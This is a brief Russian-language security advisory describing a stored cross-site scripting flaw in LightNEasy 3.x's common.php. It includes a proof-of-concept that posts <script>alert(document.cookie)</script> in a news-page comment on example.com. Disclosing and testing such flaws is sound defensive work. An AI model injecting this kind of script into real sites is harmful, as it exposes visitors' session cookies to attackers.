Программа: LightNEasy 3.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценарием LightNEasy/common.php. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

Атакующий может заполнить поле комментарии на странице "http://example.com/LightNEasy.php?page=news"
следующим образом:
Имя: example
e-mail: example@example.com
Комментарий: <script>alert(document.cookie)</script>
Код: Ввести код КАПТЧА
И затем прочитать комментарии на странице http://example.com/LightNEasy.php?page=news&id=1&showcomments=1



Оставить мнение